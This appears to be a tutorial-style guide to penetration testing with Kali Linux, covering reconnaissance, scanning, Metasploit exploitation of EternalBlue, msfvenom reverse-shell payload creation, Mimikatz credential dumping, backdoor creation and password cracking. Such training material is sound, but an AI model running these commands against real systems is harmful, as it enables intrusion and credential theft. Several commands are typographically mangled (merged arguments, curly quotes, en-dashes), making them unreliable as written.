Here’s a structured guide to performing penetration testing and vulnerability assessment using Kali Linux, following the standard pentesting methodology :

---

1. Penetration Testing Methodology

Follow this step-by-step approach to ensure thorough testing:

A. Planning & Reconnaissance

• Objective : Define scope, goals, and rules of engagement.
• Tools :
  • Passive Reconnaissance (OSINT):
    • Maltego : Map relationships (domains, IPs, emails).
    • theHarvester : Gather emails, subdomains, and employee info.
      • theharvester -d target.com -l 500 -b all
    • Shodan : Search for exposed services online (web interface: shodan.io ).
  • Active Reconnaissance :
    • Nmap : Scan for open ports and services.
      • nmap -sV -T4 -p- 192.168.1.100 # Full scan with service detection

B. Scanning & Enumeration

• Network Scanning :
  • Nmap : Identify open ports, services, and OS.
    • nmap -A -T4 192.168.1.0/24 # Aggressive scan of a subnet
  • Masscan : Rapid port scanning (for large networks):
    • masscan –rate=1000192.168.1.0/24 -p1-65535
• Vulnerability Scanning :
  • Nessus : Comprehensive vulnerability scanner (requires license).
  • OpenVAS : Free alternative for vulnerability assessment.
    • sudo openvas-start # Start OpenVAS services
  • Nikto : Web server scanner.
    • nikto -h http://target.com
• Web Application Scanning :
  • OWASP ZAP : GUI tool for finding web app vulnerabilities.
  • sqlmap : Detect SQL injection vulnerabilities.
    • sqlmap -u “http://target.com/login.php?username=admin” –dbs

C. Exploitation

• Exploit Frameworks :
  • Metasploit : Use pre-built exploits from the database.
  • msfconsole
  • search exploit/windows/smb/ms17_010_eternalblue # Example exploit
  • use exploit/windows/smb/ms17_010_eternalblue
  • set RHOSTS 192.168.1.100
  • exploit
  • Exploit-DB : Manual exploit development (https://www.exploit-db.com/ ).
• Common Exploits :
  • Unpatched Services : Exploit outdated software (e.g., Apache, SMB).
  • SQL Injection : Use sqlmap to gain database access.
  • Buffer Overflow : Use tools like Metasploit’s msfvenom to create payloads:
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -f exe > payload.exe

D. Post-Exploitation

• Maintain Access :
  • Meterpreter : Use the meterpreter payload for persistent access.
    • meterpreter > sysinfo # Get system info
    • meterpreter > shell # Get a shell
  • Create a Backdoor : Add a user or modify system files.
• Privilege Escalation :
  • LinEnum/WinPEAS : Enumerate system vulnerabilities.
    • ./LinEnum.sh -u # Linux privilege escalation checks
  • Mimikatz : Dump credentials (Windows targets).
    • mimikatz.exe “privilege::debug””sekurlsa::logonpasswords”exit
• Lateral Movement :
  • Use Meterpreter or SSH to move laterally across the network.

E. Reporting

• Document Findings :
  • List vulnerabilities, their severity, and impact.
  • Include screenshots, Nmap XML reports, and exploit logs.
• Tools for Reporting :
  • LaTeX/Markdown : Write technical reports.
  • Burp Suite : Export web app scan results.
  • Metasploit Reports : Use msfconsole’s reporting features.

---

2. Vulnerability Assessment Tools

A. Network Vulnerability Scanners

• Nessus : Commercial tool for comprehensive scans.
• OpenVAS : Free alternative to Nessus.
• Nmap Scripting Engine (NSE) :
  • nmap -sV –script=vuln 192.168.1.100 # Run vulnerability scripts

B. Web Application Scanners

• OWASP ZAP : GUI-based scanner for web apps.
• sqlmap : SQL injection scanner.
• DirBuster : Enumerate directories and files.
• Wapiti : Automated web app vulnerability scanner.

C. Wireless Vulnerability Assessment

• Aircrack-ng : Crack WPA/WPA2 passwords.
  • airodump-ng wlan0mon # Capture handshake
  • aircrack-ng -w wordlist.txt capfile.cap

D. Password Cracking

• John the Ripper : Crack hashes.
  • john –wordlist=/usr/share/wordlists/rockyou.txt hash.txt
• Hashcat : GPU-accelerated cracking.bash
  • hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt

---

3. Best Practices

• Authorization : Always obtain written permission before testing.
• Ethical Compliance : Follow the Penetration Testing Execution Standard (PTES) .
• Documentation : Keep logs of every step (commands, findings, screenshots).
• Avoid Noise : Use Nmap’s -T4 for faster scans but avoid overwhelming networks.
• Use VMs : Test in a controlled environment (e.g., Metasploitable VM).

---

4. Example Workflow

1. Reconnaissance :
   • Use theHarvester to gather subdomains of target.com.
   • Scan with Nmap to find open ports (e.g., 80, 443, 22).
2. Exploitation :
   • Use sqlmap to find SQLi vulnerabilities on http://target.com/login.
   • Exploit a known SMB vulnerability with Metasploit .
3. Post-Exploitation :
   • Use Meterpreter to escalate privileges and move laterally.
4. Reporting :
   • Document the SQLi exploit, SMB vulnerability, and privilege escalation steps.

---

5. Quick Reference Table

Phase	Tool	Command/Usage
Reconnaissance	theHarvester	theharvester -d target.com -l 500 -b all
Scanning	Nmap	nmap -sV -T4 -p- 192.168.1.100
Exploitation	Metasploit	msfconsole; use exploit/windows/smb/ms17_010_eternalblue
Post-Exploitation	Meterpreter	meterpreter > sysinfo
Web Scanning	sqlmap	sqlmap -u "http://target.com/login.php?user=admin" --dbs
Wireless Cracking	Aircrack-ng	aircrack-ng -w wordlist.txt capfile.cap

---

6. Resources for Mastery

• Certifications :
  • OSCP (Offensive Security Certified Professional) : Practical pentesting.
  • CEH (Certified Ethical Hacker) : Broad vulnerability assessment.
• Practice Platforms :
  • Hack The Box (Real-world scenarios).
  • OverTheWire (CTF challenges).
  • TryHackMe (Guided labs).

---

Final Tips

• Stay Updated : Follow CVE databases (e.g., CVE Details ).
• Automate : Write scripts for repetitive tasks (e.g., Nmap scans).
• Join Communities : Engage with forums like Offensive Security or Reddit’s r/penetrationtesting .

By following this methodology and leveraging Kali Linux’s tools, you can systematically identify and exploit vulnerabilities while maintaining ethical standards. 🔍💻